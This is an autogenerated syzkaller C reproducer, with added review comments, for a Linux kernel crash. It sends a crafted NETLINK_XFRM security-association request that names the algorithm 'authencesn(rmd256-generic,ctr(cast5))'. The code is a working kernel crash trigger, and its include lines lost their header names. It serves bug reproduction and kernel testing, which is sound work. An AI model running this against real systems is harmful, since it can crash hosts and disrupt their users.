// https://syzkaller.appspot.com/bug?id=d76b65a985a4cbf10165b3cbb882f59a0ab090bd
// autogenerated by syzkaller (http://github.com/google/syzkaller)
//
// Kernel crash reproducer.  main() maps a fixed 16 MiB region at 0x20000000;
// loop() then writes one netlink request into that region byte by byte at
// hard-coded addresses and sends it over a NETLINK_XFRM socket.  Every
// address used below (0x200ef000, 0x20122fc8, 0x203e7ec4, 0x20c00000) lies
// inside that mapping, so loop() must never be called without main()'s mmap.
// No syscall result is checked; the program makes exactly one attempt.
#define _GNU_SOURCE
// NOTE(review): the header names were lost in extraction (the <...> operands
// are missing).  The calls used need <endian.h> (htobe16/htobe32), <stdint.h>,
// <string.h> (memset/memcpy), <sys/syscall.h> (__NR_*) and <unistd.h>
// (syscall) -- confirm against the original reproducer before building.
#include
#include
#include
#include
#include
// Fallback syscall numbers for toolchains whose headers lack them.  The
// values 370/192/359 match the 32-bit x86 table, and mmap is redirected to
// mmap2 below, so this reproducer appears to target a 32-bit ABI; the
// 4-byte pointer-sized fields written into the msghdr/iovec agree with that.
#ifndef __NR_sendmsg
#define __NR_sendmsg 370
#endif
#ifndef __NR_mmap
#define __NR_mmap 192
#endif
#ifndef __NR_socket
#define __NR_socket 359
#endif
// mmap2 takes its offset in pages rather than bytes; the offset passed is 0
// either way.
#undef __NR_mmap
#define __NR_mmap __NR_mmap2

// Saved syscall results.  r[0] holds the netlink socket fd; memset(-1) below
// pre-fills it with -1, and a failed socket() is never detected (sendmsg
// would then just fail on the bad descriptor).
long r[1];

// Builds and sends a single NETLINK_XFRM request.  The addresses form four
// objects laid out for a 32-bit ABI: a msghdr at 0x20122fc8, a sockaddr_nl
// at 0x200ef000, a one-entry iovec at 0x20c00000 and the netlink message
// itself at 0x203e7ec4 (0x13c bytes, ending exactly at 0x203e8000).
void loop()
{
  memset(r, -1, sizeof(r));
  // socket(AF_NETLINK /*0x10*/, SOCK_DGRAM /*2*/, NETLINK_XFRM /*0xc*/)
  r[0] = syscall(__NR_socket, 0x10, 2, 0xc);

  // msghdr.msg_name -> sockaddr_nl { nl_family = AF_NETLINK, nl_pad = 0,
  // nl_pid = 0 (kernel), nl_groups = 0 }; msg_namelen = 12.
  *(uint32_t*)0x20122fc8 = 0x200ef000;
  *(uint16_t*)0x200ef000 = 0x10;
  *(uint16_t*)0x200ef002 = 0;
  *(uint32_t*)0x200ef004 = 0;
  *(uint32_t*)0x200ef008 = 0;
  *(uint32_t*)0x20122fcc = 0xc;

  // msghdr.msg_iov -> iovec { iov_base = 0x203e7ec4, iov_len (set further
  // down) = 0x13c }.
  *(uint32_t*)0x20122fd0 = 0x20c00000;
  *(uint32_t*)0x20c00000 = 0x203e7ec4;

  // nlmsghdr at 0x203e7ec4: nlmsg_len = 0x13c, nlmsg_type = 0x10, flags = 0,
  // seq = 0, pid = 0.  0x10 is the XFRM message base; it is consistent with
  // XFRM_MSG_NEWSA (an "add SA" request) -- confirm against the kernel
  // headers for the target version.  Note nlmsg_flags is 0, i.e. no
  // NLM_F_REQUEST/NLM_F_ACK, which is itself an unusual request shape.
  *(uint32_t*)0x203e7ec4 = 0x13c;
  *(uint16_t*)0x203e7ec8 = 0x10;
  *(uint16_t*)0x203e7eca = 0;
  *(uint32_t*)0x203e7ecc = 0;
  *(uint32_t*)0x203e7ed0 = 0;

  // Message payload at 0x203e7ed4 (0xe0 bytes).  The field offsets written
  // are consistent with struct xfrm_usersa_info using 8-byte u64 alignment
  // (selector, id, saddr, lifetime cfg/cur, stats, seq, reqid, family,
  // mode, replay_window, flags) -- treat the field names below as a
  // reading of the offsets, not as verified against a specific kernel.
  // sel.daddr = 127.0.0.1 (stored big-endian)
  *(uint32_t*)0x203e7ed4 = htobe32(0x7f000001);
  // sel.saddr = 172.20.0.0 (written byte-wise)
  *(uint8_t*)0x203e7ee4 = 0xac;
  *(uint8_t*)0x203e7ee5 = 0x14;
  *(uint8_t*)0x203e7ee6 = 0;
  *(uint8_t*)0x203e7ee7 = 0;
  // sel.dport/dport_mask/sport/sport_mask = 0; sel.family = 0 (AF_UNSPEC)
  *(uint16_t*)0x203e7ef4 = 0;
  *(uint16_t*)0x203e7ef6 = htobe16(0);
  *(uint16_t*)0x203e7ef8 = 0;
  *(uint16_t*)0x203e7efa = htobe16(0);
  *(uint16_t*)0x203e7efc = 0;
  // sel.prefixlen_d / prefixlen_s / proto = 0
  *(uint8_t*)0x203e7efe = 0;
  *(uint8_t*)0x203e7eff = 0;
  *(uint8_t*)0x203e7f00 = 0;
  // sel.ifindex / sel.user = 0
  *(uint32_t*)0x203e7f04 = 0;
  *(uint32_t*)0x203e7f08 = 0;
  // id.daddr = 224.0.0.2 (a multicast address), id.spi = 0, id.proto = 0
  *(uint32_t*)0x203e7f0c = htobe32(0xe0000002);
  *(uint32_t*)0x203e7f1c = 0;
  *(uint8_t*)0x203e7f20 = 0;
  // saddr = 255.255.255.255
  *(uint32_t*)0x203e7f24 = htobe32(-1);
  // lifetime cfg (8 x u64) and current lifetime (4 x u64): all zero, i.e.
  // no soft/hard limits.
  *(uint64_t*)0x203e7f34 = 0;
  *(uint64_t*)0x203e7f3c = 0;
  *(uint64_t*)0x203e7f44 = 0;
  *(uint64_t*)0x203e7f4c = 0;
  *(uint64_t*)0x203e7f54 = 0;
  *(uint64_t*)0x203e7f5c = 0;
  *(uint64_t*)0x203e7f64 = 0;
  *(uint64_t*)0x203e7f6c = 0;
  *(uint64_t*)0x203e7f74 = 0;
  *(uint64_t*)0x203e7f7c = 0;
  *(uint64_t*)0x203e7f84 = 0;
  *(uint64_t*)0x203e7f8c = 0;
  // stats (3 x u32), seq, reqid: zero
  *(uint32_t*)0x203e7f94 = 0;
  *(uint32_t*)0x203e7f98 = 0;
  *(uint32_t*)0x203e7f9c = 0;
  *(uint32_t*)0x203e7fa0 = 0;
  *(uint32_t*)0x203e7fa4 = 0;
  // family = 0, mode = 0 (transport), replay_window = 0, flags = 0
  *(uint16_t*)0x203e7fa8 = 0;
  *(uint8_t*)0x203e7faa = 0;
  *(uint8_t*)0x203e7fab = 0;
  *(uint8_t*)0x203e7fac = 0;

  // Single netlink attribute at 0x203e7fb4: nla_len = 0x4c (4 + 64 + 8),
  // nla_type = 0x12.  The body is a 64-byte NUL-padded algorithm name
  // followed by two u32 fields, which is the shape of struct xfrm_algo_aead
  // (alg_key_len, alg_icv_len) -- consistent with XFRMA_ALG_AEAD, but
  // confirm against the target kernel's xfrm.h.  The name decodes to
  // "authencesn(rmd256-generic,ctr(cast5))": an authencesn template over a
  // plain hash and a CTR-mode cipher, not a genuine AEAD.  Both key length
  // and ICV length are 0 and no key bytes follow, so the crash path is in
  // how the kernel resolves/validates this algorithm string for an SA.
  *(uint16_t*)0x203e7fb4 = 0x4c;
  *(uint16_t*)0x203e7fb6 = 0x12;
  memcpy((void*)0x203e7fb8,
         "\x61\x75\x74\x68\x65\x6e\x63\x65\x73\x6e\x28\x72\x6d\x64\x32\x35\x36"
         "\x2d\x67\x65\x6e\x65\x72\x69\x63\x2c\x63\x74\x72\x28\x63\x61\x73\x74"
         "\x35\x29\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
         64);
  *(uint32_t*)0x203e7ff8 = 0;
  *(uint32_t*)0x203e7ffc = 0;

  // iovec.iov_len = 0x13c; msghdr.msg_iovlen = 1, msg_control = NULL,
  // msg_controllen = 0, msg_flags = 0.
  *(uint32_t*)0x20c00004 = 0x13c;
  *(uint32_t*)0x20122fd4 = 1;
  *(uint32_t*)0x20122fd8 = 0;
  *(uint32_t*)0x20122fdc = 0;
  *(uint32_t*)0x20122fe0 = 0;

  // sendmsg(fd, &msghdr, 0).  Adding XFRM SAs is normally restricted to
  // CAP_NET_ADMIN in the socket's network namespace, so on a default
  // configuration this request is expected to require that privilege (or a
  // user namespace granting it) -- verify for the kernel under test.  From a
  // monitoring standpoint, an AF_NETLINK/NETLINK_XFRM socket followed by a
  // sendmsg from an unexpected process is the observable signature.
  syscall(__NR_sendmsg, r[0], 0x20122fc8, 0);
}

// Entry point: maps the scratch region and runs the reproducer once.
int main()
{
  // mmap(0x20000000, 16 MiB, PROT_READ|PROT_WRITE /*3*/,
  //      MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS /*0x32*/, -1, 0)
  // MAP_FIXED silently replaces anything already mapped there; the result
  // is not checked, so a failed mapping would make loop() fault.
  syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
  loop();
  return 0;
}